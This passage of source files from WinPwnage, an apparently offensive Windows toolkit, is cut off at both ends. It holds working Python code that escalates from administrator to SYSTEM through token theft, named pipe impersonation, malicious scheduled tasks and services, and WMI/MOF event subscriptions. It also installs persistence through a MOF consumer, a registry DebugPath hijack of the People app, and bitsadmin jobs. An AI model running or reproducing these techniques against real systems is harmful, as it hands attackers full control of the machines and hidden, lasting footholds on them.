TOKEN_PRIVS),byref(hToken)) == 0: 31 | print_error("Error while grabbing GetCurrentProcess()'s token: {}".format(GetLastError())) 32 | 33 | tp = TOKEN_PRIVILEGES2() 34 | tp.PrivilegeCount = 1 35 | tp.Privileges = (20, 0, 0x00000002) 36 | 37 | if AdjustTokenPrivileges(hToken, False, byref(tp), 0, None, None) == 0: 38 | print_error("Error while assigning SE_DEBUG_NAME to GetCurrentProcess()'s token': {}".format(GetLastError())) 39 | else: 40 | print_success("Successfully enabled SeDebugPrivilege") 41 | 42 | DWORD_array = (DWORD * 0xFFFF) 43 | ProcessIds = DWORD_array() 44 | ProcessIdsSize = sizeof(ProcessIds) 45 | ProcessesReturned = DWORD() 46 | EnumProcesses(ProcessIds, ProcessIdsSize, ProcessesReturned) 47 | 48 | RunningProcesses = int(ProcessesReturned.value / sizeof(DWORD)) 49 | for process in range(RunningProcesses): 50 | ProcessId = ProcessIds[process] 51 | currenthandle = OpenProcess(PROCESS_QUERY_INFORMATION, False, ProcessId) 52 | if currenthandle: 53 | ProcessName = (c_char * 260)() 54 | if GetProcessImageFileName(currenthandle, ProcessName, 260): 55 | ProcessName = ProcessName.value.split(b"\\")[-1] 56 | processToken = HANDLE(c_void_p(-1).value) 57 | OpenProcessToken(currenthandle, TOKEN_PRIVS, byref(processToken)) 58 | TokenInformation = (c_byte * 4096)() 59 | ReturnLength = DWORD() 60 | GetTokenInformation(processToken, TOKEN_INFORMATION_CLASS.TokenUser, byref(TokenInformation), sizeof(TokenInformation), byref(ReturnLength)) 61 | Token = cast(TokenInformation, POINTER(TOKEN_USER)) 62 | StringSid = LPSTR() 63 | ConvertSidToStringSidA(Token.contents.User.Sid, byref(StringSid)) 64 | hTokendupe = HANDLE(c_void_p(-1).value) 65 | DuplicateTokenEx(processToken, TOKEN_ALL_ACCESS, None, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, byref(hTokendupe)) 66 | ImpersonateLoggedOnUser(hTokendupe) 67 | print_info("Impersonating System IL token") 68 | lpStartupInfo = STARTUPINFO() 69 | lpStartupInfo.cb = sizeof(lpStartupInfo) 70 | lpProcessInformation = PROCESS_INFORMATION() 71 | lpStartupInfo.dwFlags = 0x00000001 72 | lpStartupInfo.wShowWindow = 5 73 | 74 | if CreateProcessWithToken(hTokendupe, 0x00000002, payload, params, 0x00000010, None, None, byref(lpStartupInfo), byref(lpProcessInformation)) == 0: 75 | print_error("Error while triggering admin payload using CreateProcessWithLogonW: {}".format(GetLastError())) 76 | else: 77 | print_success("Successfully elevated process PID: {}".format(lpProcessInformation.dwProcessId)) 78 | break 79 | else: 80 | print_error("Cannot proceed, invalid payload") 81 | return False 82 | -------------------------------------------------------------------------------- /winpwnage/functions/elevate/elevateMethod3.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | from winpwnage.core.winstructures import * 4 | 5 | #Creds to: https://gist.github.com/highsenburger69/09b816daa16f020d188c289fd401b0b2 6 | 7 | elevateMethod3_info = { 8 | "Description": "Elevate from administrator to NT AUTHORITY SYSTEM using named pipe impersonation", 9 | "Method": "Named pipe impersonation", 10 | "Id": "3", 11 | "Type": "Elevation", 12 | "Fixed In": "99999" if information().admin() == True else "0", 13 | "Works From": "7600", 14 | "Admin": True, 15 | "Function Name": "elevateMethod3", 16 | "Function Payload": True, 17 | } 18 | 19 | def Service(*args): 20 | service_name = r"WinPwnage" 21 | service_bin = r"%COMSPEC% /c ping -n 5 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe" 22 | 23 | serviceDBHandle = OpenSCManager(bytes(r"\\localhost", encoding="utf-8"), 24 | bytes(r"ServicesActive", encoding="utf-8"), 25 | 0x0001 | 0x0002) 26 | if not serviceDBHandle: 27 | print_error("Error while connecting to the local service database using OpenSCManager: {}".format(GetLastError())) 28 | return False 29 | 30 | schService = CreateService(serviceDBHandle, bytes(service_name, encoding="utf-8"), 31 | None, (0x00020000 | 0x00040000 | 0x0010), 0x00000010, 32 | 0x00000003, 0x00000000, bytes(service_bin, encoding="utf-8"), 33 | None, None, None, None, None) 34 | if not schService: 35 | print_error("Error while creating our service using CreateService: {}".format(GetLastError())) 36 | return False 37 | else: 38 | print_info("Successfully created service") 39 | 40 | serviceHandle = OpenService(serviceDBHandle, bytes(service_name, encoding="utf-8"), 0x0010) 41 | if not StartService(serviceHandle, 0, None): 42 | print_error("Unable to start service, attempting rollback") 43 | if not DeleteService(serviceHandle): 44 | print_error("Unable to delete service, manual cleaning is needed!") 45 | else: 46 | print_success("Successfully deleted service") 47 | else: 48 | print_success("Successfully started service") 49 | 50 | CloseServiceHandle(serviceDBHandle) 51 | CloseServiceHandle(schService) 52 | 53 | def delete_service(): 54 | serviceDBHandle = OpenSCManager(bytes(r"\\localhost", encoding="utf-8"), 55 | bytes(r"ServicesActive", encoding="utf-8"), 56 | 0x0001) 57 | 58 | print_info("Performing cleanup") 59 | serviceHandle = OpenService(serviceDBHandle, bytes(r"WinPwnage", encoding="utf-8"), 0x00010000) 60 | 61 | if DeleteService(serviceHandle) == 0: 62 | print_error("Unable to delete service, manual cleaning is needed!") 63 | else: 64 | print_success("Successfully deleted service") 65 | 66 | CloseServiceHandle(serviceDBHandle) 67 | 68 | def elevateMethod3(payload): 69 | if not information().admin(): 70 | print_error("Cannot proceed, we are not elevated") 71 | return False 72 | 73 | if payloads().exe(payload): 74 | params = payloads().exe(payload)[1].replace(payloads().exe(payload)[1].split(' ', 1)[0], '').lstrip() 75 | payload = payloads().exe(payload)[1].split(' ', 1)[0] 76 | 77 | hPipe = CreateNamedPipe(bytes(r"\\.\pipe\WinPwnagePipe", encoding="utf-8"), 78 | 0x00000003, 0x00000000 | 0x00000000, 255, 0, 0, 0, None) 79 | if not hPipe: 80 | print_error("Error while creating our named pipe using CreateNamedPipe: {}".format(GetLastError())) 81 | return False 82 | else: 83 | print_success("Successfully created Named Pipe") 84 | 85 | RunService = CFUNCTYPE(None, POINTER(INT))(Service) 86 | print_info("Running service function in another thread, waiting for cmd.exe to send data to pipe") 87 | cThread = CreateThread(None, 0, RunService, None, 0, None) 88 | if not cThread: 89 | print_error("Error while Creating thread in the virtual space of the current process to mimick a client/server interaction like a multi-thread named pipe server using CreateThread: {}".format(GetLastError())) 90 | return False 91 | 92 | CloseHandle(cThread) 93 | 94 | if not ConnectNamedPipe(hPipe, None): 95 | print_error("Error while waiting the client to trigger a connection in the Named Pipe using ConnectNamedPipe: {}".format(GetLastError())) 96 | return False 97 | else: 98 | print_success("Connected to Named Pipe") 99 | 100 | print_info("Receiving payload from pipe") 101 | ReadFile(hPipe, 0, 0, None, None) 102 | 103 | if not ImpersonateNamedPipeClient(hPipe): 104 | print_error("Error while impersonating the access token at the end of the pipe using ImpersonateNamedPipeClient: {}".format(GetLastError())) 105 | delete_service() 106 | return False 107 | else: 108 | print_success("Impersonated the client's security context") 109 | 110 | hToken = HANDLE(c_void_p(-1).value) 111 | if not OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, False, byref(hToken)): 112 | print_error("Error while opening our thread's token using OpenThreadToken: {}".format(GetLastError())) 113 | delete_service() 114 | return False 115 | else: 116 | print_success("Opened our current process's thread token") 117 | 118 | print_info("Converting token into a primary token") 119 | hPrimaryToken = HANDLE(c_void_p(-1).value) 120 | if DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, None, SECURITY_IMPERSONATION_LEVEL.SecurityDelegation, TOKEN_TYPE.TokenPrimary, byref(hPrimaryToken)) == STATUS_UNSUCCESSFUL: 121 | print_error("Error while trying to convert the token into a primary token using DuplicateTokenEx with SecurityDelegation: {}".format(GetLastError())) 122 | print_info("Switching to different security impersonation level to SecurityImpersonation") 123 | if DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, None, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary,byref(hPrimaryToken)) == STATUS_UNSUCCESSFUL: 124 | print_error("Error while trying to convert the token into a primary token using DuplicateTokenEx with SecurityImpersonation: {}".format(GetLastError())) 125 | delete_service() 126 | return False 127 | else: 128 | print_success("Successfully converted token into a primary token using DuplicateTokenEx with SecurityImpersonation") 129 | else: 130 | print_success("Successfully converted token into a primary token using DuplicateTokenEx with SecurityDelegation") 131 | 132 | print_info("Attempting to create elevated process") 133 | lpStartupInfo = STARTUPINFO() 134 | lpStartupInfo.cb = sizeof(lpStartupInfo) 135 | lpProcessInformation = PROCESS_INFORMATION() 136 | lpStartupInfo.dwFlags = 0x00000001 137 | lpStartupInfo.wShowWindow = 5 138 | if CreateProcessAsUser(hPrimaryToken, None, payload, params, None, False, 0, None, None, byref(lpStartupInfo), byref(lpProcessInformation)) == 0: 139 | print_error("Error while triggering payload using CreateProcessAsUser {}".format(GetLastError())) 140 | print_info("Switching create process method to CreateProcessWithToken") 141 | if CreateProcessWithToken(hPrimaryToken, 0x00000002, payload, params, 0x00000010, None, None, byref(lpStartupInfo), byref(lpProcessInformation)) == 0: 142 | print_error("Error while triggering payload using CreateProcessWithToken: {}".format(GetLastError())) 143 | else: 144 | print_success("Successfully elevated process PID: {} using CreateProcessWithToken".format(lpProcessInformation.dwProcessId)) 145 | else: 146 | print_success("Successfully elevated process PID: {} using CreateProcessAsUser".format(lpProcessInformation.dwProcessId)) 147 | 148 | delete_service() 149 | else: 150 | print_error("Cannot proceed, invalid payload") 151 | return False 152 | -------------------------------------------------------------------------------- /winpwnage/functions/elevate/elevateMethod4.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import datetime 4 | import tempfile 5 | import time 6 | import os 7 | 8 | elevateMethod4_info = { 9 | "Description": "Elevate from administrator to NT AUTHORITY SYSTEM using schtasks.exe (non interactive)", 10 | "Method": "Malicious scheduled task that gets deleted once used", 11 | "Id": "4", 12 | "Type": "Elevation", 13 | "Fixed In": "99999" if information().admin() == True else "0", 14 | "Works From": "7600", 15 | "Admin": True, 16 | "Function Name": "elevateMethod4", 17 | "Function Payload": True, 18 | } 19 | 20 | def elevateMethod4(payload): 21 | if not information().admin(): 22 | print_error("Cannot proceed, we are not elevated") 23 | return False 24 | 25 | if payloads().exe(payload): 26 | xml_template = """ 27 | 28 | 29 | {date} 30 | \\Microsoft\\Windows\\elevator 31 | 32 | 33 | 34 | true 35 | 36 | 37 | 38 | 39 | S-1-5-18 40 | HighestAvailable 41 | 42 | 43 | 44 | IgnoreNew 45 | false 46 | false 47 | false 48 | true 49 | false 50 | 51 | true 52 | false 53 | 54 | true 55 | true 56 | false 57 | false 58 | false 59 | PT0S 60 | 7 61 | 62 | PT2H 63 | 999 64 | 65 | 66 | 67 | 68 | "{payload}" 69 | 70 | 71 | """.format(date=str(datetime.datetime.now()).replace(' ', 'T'), payload=payloads().exe(payload)[1]) 72 | 73 | try: 74 | xml_file = open(os.path.join(tempfile.gettempdir(), "elevator.xml"), "w") 75 | xml_file.write(xml_template) 76 | xml_file.close() 77 | except Exception as error: 78 | return False 79 | 80 | time.sleep(5) 81 | 82 | if os.path.isfile(os.path.join(tempfile.gettempdir(), "elevator.xml")): 83 | if process().create("schtasks.exe",params="/create /xml {path} /tn elevator".format(path=os.path.join(tempfile.gettempdir(), "elevator.xml"))): 84 | print_success("Successfully created scheduled task") 85 | else: 86 | print_error("Unable to create scheduled task") 87 | return False 88 | 89 | time.sleep(5) 90 | 91 | if process().create("schtasks.exe",params="/run /tn elevator"): 92 | print_success("Successfully ran scheduled task") 93 | else: 94 | print_error("Unable to run scheduled task") 95 | return False 96 | 97 | time.sleep(5) 98 | 99 | print_info("Performing cleanup") 100 | if process().create("schtasks.exe",params="/delete /tn elevator"): 101 | print_success("Successfully deleted scheduled task") 102 | else: 103 | print_error("Unable to delete scheduled task") 104 | return False 105 | 106 | try: 107 | os.remove(os.path.join(tempfile.gettempdir(), "elevator.xml")) 108 | except Exception as error: 109 | return False 110 | else: 111 | print_success("Successfully deleted xml file") 112 | else: 113 | print_error("Unable to create scheduled task, xml file not found") 114 | return False 115 | else: 116 | print_error("Cannot proceed, invalid payload") 117 | return False -------------------------------------------------------------------------------- /winpwnage/functions/elevate/elevateMethod5.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | from winpwnage.core.winstructures import * 4 | import time 5 | 6 | elevateMethod5_info = { 7 | "Description": "Elevate from administrator to NT AUTHORITY SYSTEM using wmic.exe (non interactive)", 8 | "Method": "Handle inheritance", 9 | "Id": "5", 10 | "Type": "Elevation", 11 | "Fixed In": "99999" if information().admin() == True else "0", 12 | "Works From": "7600", 13 | "Admin": True, 14 | "Function Name": "elevateMethod5", 15 | "Function Payload": True, 16 | } 17 | 18 | def elevateMethod5(payload): 19 | if not information().admin(): 20 | print_error("Cannot proceed, we are not elevated") 21 | return False 22 | 23 | if payloads().exe(payload): 24 | cmds = { 25 | 'create': { 26 | ('__EventFilter', '/namespace:"\\\\root\\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA \'Win32_PerfFormattedData_PerfOS_System\'"'), 27 | ('CommandLineEventConsumer', '/namespace:"\\\\root\\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="{path}", CommandLineTemplate="{path}"'), 28 | ('__FilterToConsumerBinding', '/namespace:"\\\\root\\subscription" PATH __FilterToConsumerBinding CREATE Filter=\'__EventFilter.Name="BotFilter82"\', Consumer=\'CommandLineEventConsumer.Name="BotConsumer23"\''), 29 | }, 30 | 'delete': { 31 | ('__EventFilter', '/namespace:"\\\\root\\subscription" PATH __EventFilter WHERE Name="BotFilter82" DELETE'), 32 | ('CommandLineEventConsumer', '/namespace:"\\\\root\\subscription" PATH CommandLineEventConsumer WHERE Name="BotConsumer23" DELETE'), 33 | ('__FilterToConsumerBinding', '/namespace:"\\\\root\\subscription" PATH __FilterToConsumerBinding WHERE Filter=\'__EventFilter.Name="BotFilter82"\' DELETE'), 34 | } 35 | } 36 | 37 | for x in cmds["create"]: 38 | exit_code = process().create("wmic.exe", params=x[1].format(path=payloads().exe(payload)[1]), get_exit_code=True) 39 | if exit_code == 0: 40 | print_success("Successfully {action} (exit code: {code})".format(action=x[0], code=exit_code)) 41 | else: 42 | print_error("Unable to {action} (exit code: {code})".format(action=x[0], code=exit_code)) 43 | 44 | print_info("Waiting for (15) seconds for payload to get executed") 45 | time.sleep(15) 46 | 47 | print_info("Performing cleanup") 48 | for x in cmds["delete"]: 49 | exit_code = process().create("wmic.exe", params=x[1].format(path=payloads().exe(payload)[1]), get_exit_code=True) 50 | if exit_code == 0: 51 | print_success("Successfully deleted {action} (exit code: {code})".format(action=x[0], code=exit_code)) 52 | else: 53 | print_error("Unable to delete {action} (exit code: {code})".format(action=x[0], code=exit_code)) 54 | else: 55 | print_error("Cannot proceed, invalid payload") 56 | return False 57 | -------------------------------------------------------------------------------- /winpwnage/functions/elevate/elevateMethod6.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | from winpwnage.core.winstructures import * 4 | import os 5 | 6 | elevateMethod6_info = { 7 | "Description": "Elevate from administrator to NT AUTHORITY SYSTEM using Windows Service (non interactive)", 8 | "Method": "Malicious Windows Service that gets deleted once used", 9 | "Id": "6", 10 | "Type": "Elevation", 11 | "Fixed In": "99999" if information().admin() == True else "0", 12 | "Works From": "7600", 13 | "Admin": True, 14 | "Function Name": "elevateMethod6", 15 | "Function Payload": True, 16 | } 17 | 18 | def elevateMethod6(payload): 19 | if not information().admin(): 20 | print_error("Cannot proceed, we are not elevated") 21 | return False 22 | 23 | if payloads().exe(payload): 24 | servicename = bytes(r"WinPwnage", encoding="utf-8") 25 | localhost = bytes(r"\\localhost", encoding="utf-8") 26 | 27 | print_info("Installing service") 28 | schSCManager = OpenSCManager(localhost, bytes(r"ServicesActive", encoding="utf-8"), 0x0001 | 0x0002) 29 | if not schSCManager: 30 | print_error("Error while connecting to the local service database using OpenSCManager: ({error})".format(error=GetLastError())) 31 | return False 32 | 33 | schService = CreateService(schSCManager, servicename, None, 0x00020000 | 0x00040000 | 0x0010, 0x00000010, 34 | 0x00000003, 0x00000000, bytes("rundll32.exe {dll},RouteTheCall {payload}".format(dll=os.path.join(information().system_directory(), 35 | "zipfldr.dll"), payload=payloads().exe(payload)[1]), encoding="utf-8"), None, None, None, None, None) 36 | if not schService: 37 | print_error("Error while installing our service using CreateService: ({error})".format(error=GetLastError())) 38 | return False 39 | else: 40 | print_success("Successfully installed service ({name}) using CreateService".format(name=servicename)) 41 | 42 | CloseServiceHandle(schSCManager) 43 | CloseServiceHandle(schService) 44 | 45 | schSCManager = OpenSCManager(localhost, bytes(r"ServicesActive", encoding="utf-8"), 0x0001 | 0x0002) 46 | if not schSCManager: 47 | print_error("Error while connecting to the local service database using OpenSCManager: ({error})".format(error=GetLastError())) 48 | return False 49 | 50 | # The service will fail, but the payload will spawn anyway 51 | svcHandle = OpenService(schSCManager, servicename, 0x0010) 52 | if not StartService(svcHandle, 0, None): 53 | print_success("Successfully triggered service ({name}) to load ({payload})".format(name=servicename, payload=payloads().exe(payload)[1])) 54 | else: 55 | print_error("Unable to trigger service ({name}) to load ({payload})".format(name=servicename, payload=payloads().exe(payload)[1])) 56 | 57 | CloseServiceHandle(schSCManager) 58 | CloseServiceHandle(svcHandle) 59 | 60 | print_info("Performing cleanup") 61 | schSCManager = OpenSCManager(localhost, bytes(r"ServicesActive", encoding="utf-8"), 0x0001 | 0x0002) 62 | if not schSCManager: 63 | print_error("Error while connecting to the local service database using OpenSCManager: ({error})".format(error=GetLastError())) 64 | return False 65 | 66 | svcHandle = OpenService(schSCManager, servicename, 0x00010000) 67 | if DeleteService(svcHandle): 68 | print_success("Successfully deleted service ({name})".format(name=servicename)) 69 | else: 70 | print_error("Unable to delete service ({name})".format(name=servicename)) 71 | 72 | CloseServiceHandle(schSCManager) 73 | CloseServiceHandle(svcHandle) 74 | -------------------------------------------------------------------------------- /winpwnage/functions/elevate/elevateMethod7.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | from winpwnage.core.winstructures import * 4 | import tempfile 5 | import time 6 | import os 7 | 8 | elevateMethod7_info = { 9 | "Description": "Elevate from administrator to NT AUTHORITY SYSTEM using mofcomp.exe (non interactive)", 10 | "Method": "Malicious mof file using EventFilter EventConsumer and binding that gets deleted once used", 11 | "Id": "7", 12 | "Type": "Elevation", 13 | "Fixed In": "99999" if information().admin() == True else "0", 14 | "Works From": "7600", 15 | "Admin": True, 16 | "Function Name": "elevateMethod7", 17 | "Function Payload": True, 18 | } 19 | 20 | def elevateMethod7(payload): 21 | if not information().admin(): 22 | print_error("Cannot proceed, we are not elevated") 23 | return False 24 | 25 | if payloads().exe(payload): 26 | mof_template = '''#PRAGMA AUTORECOVER 27 | #PRAGMA NAMESPACE ("\\\\\\\\.\\\\root\\\\subscription") 28 | 29 | instance of __EventFilter as $Filt 30 | { 31 | Name = "WinPwnageEventFilter"; 32 | Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA \'Win32_PerfFormattedData_PerfOS_System\'"; 33 | QueryLanguage = "WQL"; 34 | EventNamespace = "root\\\\cimv2"; 35 | }; 36 | 37 | instance of CommandLineEventConsumer as $Cons 38 | { 39 | Name = "WinPwnageConsumer"; 40 | RunInteractively=false; 41 | CommandLineTemplate="''' + payloads().exe(payload)[1].replace(os.sep, os.sep*2) + '''"; 42 | }; 43 | 44 | instance of __FilterToConsumerBinding 45 | { 46 | Filter = $Filt; 47 | Consumer = $Cons; 48 | };''' 49 | try: 50 | mof_file = open(os.path.join(tempfile.gettempdir(), "elevator.mof"), "w") 51 | mof_file.write(mof_template) 52 | mof_file.close() 53 | except Exception: 54 | print_error("Cannot proceed, unable to write mof file to disk ({})".format(os.path.join(tempfile.gettempdir(), "elevator.mof"))) 55 | return False 56 | else: 57 | print_success("Successfully wrote mof template to disk ({})".format(os.path.join(tempfile.gettempdir(), "elevator.mof"))) 58 | 59 | time.sleep(5) 60 | 61 | if os.path.isfile(os.path.join(tempfile.gettempdir(), "elevator.mof")): 62 | exit_code = process().create("mofcomp.exe", params="{}".format(os.path.join(tempfile.gettempdir(), 63 | "elevator.mof")), get_exit_code=True) 64 | if exit_code == 0: 65 | print_success("Successfully compiled mof file using mofcomp") 66 | else: 67 | print_error("Unable to compile mof file containing our payload ({})".format(payloads().exe(payload)[1])) 68 | 69 | print_info("Waiting for (15) seconds for payload to get executed") 70 | time.sleep(15) 71 | 72 | print_info("Performing cleaning") 73 | try: 74 | os.remove(os.path.join(tempfile.gettempdir(), "elevator.mof")) 75 | except Exception as error: 76 | print_error("Unable to remove mof file from temporary directory") 77 | else: 78 | print_success("Successfully removed mof file from temporary directory") 79 | 80 | cmds = [('__EventFilter', '/namespace:"\\\\root\\subscription" PATH __EventFilter WHERE Name="WinPwnageEventFilter" DELETE'), 81 | ('CommandLineEventConsumer', '/namespace:"\\\\root\\subscription" PATH CommandLineEventConsumer WHERE Name="WinPwnageConsumer" DELETE'), 82 | ('__FilterToConsumerBinding', '/namespace:"\\\\root\\subscription" PATH __FilterToConsumerBinding WHERE Filter=\'__EventFilter.Name="WinPwnageEventFilter"\' DELETE'),] 83 | 84 | for cmd in cmds: 85 | exit_code = process().create("wmic.exe", params="{}".format(cmd[1]), get_exit_code=True) 86 | if exit_code == 0: 87 | print_success("Successfully removed {event} (exit code: {code})".format(event=cmd[0], code=exit_code)) 88 | else: 89 | print_error("Unable to removed {event} (exit code: {code})".format(event=cmd[0], code=exit_code)) 90 | else: 91 | print_error("Unable to locate mof template on disk ({})".format(os.path.join(tempfile.gettempdir(), "elevator.mof"))) 92 | return False 93 | else: 94 | print_error("Cannot proceed, invalid payload") 95 | return False 96 | -------------------------------------------------------------------------------- /winpwnage/functions/persist/__init__.py: -------------------------------------------------------------------------------- 1 | #init -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod1.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | import tempfile 4 | import time 5 | import os 6 | 7 | persistMethod1_info = { 8 | "Description": "Persistence using mofcomp.exe (SYSTEM privileges)", 9 | "Method": "Malicious mof file using EventFilter EventConsumer and binding", 10 | "Id": "1", 11 | "Type": "Persistence", 12 | "Fixed In": "99999" if information().admin() == True else "0", 13 | "Works From": "7600", 14 | "Admin": True, 15 | "Function Name": "persistMethod1", 16 | "Function Payload": True, 17 | } 18 | 19 | def persistMethod1(payload, name="", add=True): 20 | if add: 21 | if payloads().exe(payload): 22 | mof_template = '''#PRAGMA AUTORECOVER 23 | #PRAGMA NAMESPACE ("\\\\\\\\.\\\\root\\\\subscription") 24 | 25 | instance of __EventFilter as $Filt 26 | { 27 | Name = "''' + name + '''"; 28 | Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 360"; 29 | QueryLanguage = "WQL"; 30 | EventNamespace = "root\\\\cimv2"; 31 | }; 32 | 33 | instance of CommandLineEventConsumer as $Cons 34 | { 35 | Name = "''' + name + '''"; 36 | RunInteractively=false; 37 | CommandLineTemplate="''' + payloads().exe(payload)[1].replace(os.sep, os.sep*2) + '''"; 38 | }; 39 | 40 | instance of __FilterToConsumerBinding 41 | { 42 | Filter = $Filt; 43 | Consumer = $Cons; 44 | };''' 45 | 46 | if information().admin(): 47 | try: 48 | mof_file = open(os.path.join(tempfile.gettempdir(), "{name}.mof".format(name=name)), "w") 49 | mof_file.write(mof_template) 50 | mof_file.close() 51 | except Exception: 52 | print_error("Cannot proceed, unable to write mof file to disk ({})".format( 53 | os.path.join(tempfile.gettempdir(), "{name}.mof".format(name=name)))) 54 | return False 55 | else: 56 | print_success("Successfully wrote mof template to disk ({})".format( 57 | os.path.join(tempfile.gettempdir(), "{name}.mof".format(name=name)))) 58 | 59 | time.sleep(5) 60 | 61 | if os.path.isfile(os.path.join(tempfile.gettempdir(), "{name}.mof".format(name=name))): 62 | print_info("Disabling file system redirection") 63 | with disable_fsr(): 64 | print_success("Successfully disabled file system redirection") 65 | exit_code = process().create("mofcomp.exe", params="{}".format(os.path.join(tempfile.gettempdir(), "{name}.mof".format(name=name))), get_exit_code=True) 66 | print_info("Exit code: {}".format(str(exit_code))) 67 | if exit_code == 0: 68 | print_success("Successfully compiled mof file containing our payload ({})".format(payloads().exe(payload)[1])) 69 | print_success("Successfully installed persistence, payload will after boot") 70 | else: 71 | print_error("Unable to compile mof file containing our payload ({})".format(payloads().exe(payload)[1])) 72 | 73 | time.sleep(5) 74 | 75 | try: 76 | os.remove(os.path.join(tempfile.gettempdir(), "{name}.mof".format(name=name))) 77 | except Exception: 78 | print_error("Unable to cleanup") 79 | return False 80 | else: 81 | print_success("Successfully cleaned up, enjoy!") 82 | else: 83 | print_error("Unable to locate mof template on disk ({})".format(os.path.join(tempfile.gettempdir(), "{name}.mof".format(name=name)))) 84 | return False 85 | else: 86 | print_error("Cannot proceed, we are not elevated") 87 | return False 88 | else: 89 | print_error("Cannot proceed, invalid payload") 90 | return False 91 | else: 92 | cmds = [ 93 | ('__EventFilter', '/namespace:"\\\\root\\subscription" PATH __EventFilter WHERE Name="{name}" DELETE'), 94 | ('CommandLineEventConsumer', '/namespace:"\\\\root\\subscription" PATH CommandLineEventConsumer WHERE Name="{name}" DELETE'), 95 | ('__FilterToConsumerBinding', '/namespace:"\\\\root\\subscription" PATH __FilterToConsumerBinding WHERE Filter=\'__EventFilter.Name="{name}"\' DELETE'), 96 | ] 97 | for i, cmd in cmds: 98 | exit_code = process().create("wmic.exe", params=cmd.format(name=name, path=payloads().exe(payload)[1]), get_exit_code=True) 99 | if exit_code == 0: 100 | print_success("Successfully removed {event} (exit code: {code})".format(event=i, code=exit_code)) 101 | else: 102 | print_error("Unable to removed {event} (exit code: {code})".format(event=i, code=exit_code)) 103 | 104 | time.sleep(3) 105 | -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod10.py: -------------------------------------------------------------------------------- 1 | try: 2 | import _winreg # Python 2 3 | except ImportError: # Python 3 4 | import winreg as _winreg 5 | from winpwnage.core.prints import * 6 | from winpwnage.core.utils import * 7 | 8 | #https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/ 9 | 10 | persistMethod10_info = { 11 | "Description": "Persistence using People windows app", 12 | "Method": "Registry key (Class) manipulation", 13 | "Id": "10", 14 | "Type": "Persistence", 15 | "Fixed In": "99999", 16 | "Works From": "14393", 17 | "Admin": False, 18 | "Function Name": "persistMethod10", 19 | "Function Payload": True, 20 | } 21 | 22 | def find_people(): 23 | index = 0 24 | people_version = [] 25 | 26 | try: 27 | key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 28 | "Software\Classes\ActivatableClasses\Package", 29 | 0, 30 | _winreg.KEY_READ) 31 | except Exception as error: 32 | print_error("Unable to open registry key, exception was raised: {}".format(error)) 33 | return False 34 | 35 | try: 36 | num = _winreg.QueryInfoKey(key)[0] 37 | for x in range(0, num): 38 | if "Microsoft.People_" in _winreg.EnumKey(key, x): 39 | people_version.append(_winreg.EnumKey(key, x)) 40 | break 41 | except WindowsError as error: 42 | pass 43 | 44 | return people_version 45 | 46 | def persistMethod10(payload, add=True): 47 | try: 48 | kpath = os.path.join("Software\Classes\ActivatableClasses\Package", 49 | find_people()[0], 50 | "DebugInformation\\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca") 51 | except IndexError: 52 | print_error("Unable to add persistence, People app is unavailable on this system") 53 | return False 54 | 55 | if add: 56 | if payloads().exe(payload): 57 | if registry().modify_key(hkey="hkcu", path=kpath, name="DebugPath", value=payloads().exe(payload)[1], create=True): 58 | print_success("Successfully created DebugPath key containing payload ({payload})".format(payload=payloads().exe(payload)[1])) 59 | print_success("Successfully installed persistence, payload will run at login") 60 | else: 61 | print_error("Unable to add persistence, exception was raised: {}".format(error)) 62 | return False 63 | else: 64 | print_error("Cannot proceed, invalid payload") 65 | return False 66 | else: 67 | if registry().remove_key(hkey="hkcu", path=kpath, name="DebugPath"): 68 | print_success("Successfully removed persistence") 69 | else: 70 | print_error("Unable to remove persistence") 71 | return False 72 | -------------------------------------------------------------------------------- /winpwnage/functions/persist/persistMethod11.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | from winpwnage.core.winstructures import * 4 | import tempfile 5 | import time 6 | import os 7 | 8 | #Creds: https://oddvar.moe and https://github.com/3gstudent/bitsadminexec 9 | 10 | persistMethod11_info = { 11 | "Description": "Persistence using bitsadmin.exe", 12 | "Method": "Malicious bitsadmin job", 13 | "Id": "11", 14 | "Type": "Persistence", 15 | "Fixed In": "99999" if information().admin() == True else "0", 16 | "Works From": "7600", 17 | "Admin": True, 18 | "Function Name": "persistMethod11", 19 | "Function Payload": True, 20 | } 21 | 22 | def persistMethod11(payload, name="", add=True): 23 | if not information().admin(): 24 | print_error("Cannot proceed, we are not elevated") 25 | return False 26 | 27 | if add: 28 | if payloads().exe(payload): 29 | # if fails, anti-virus is probably blocking this method 30 | with disable_fsr(): 31 | exit_code = process().create("bitsadmin.exe", params="/create {}".format(name), get_exit_code=True) 32 | if exit_code == 0: 33 | print_success("Successfully created job ({}) exit code ({})".format(name, 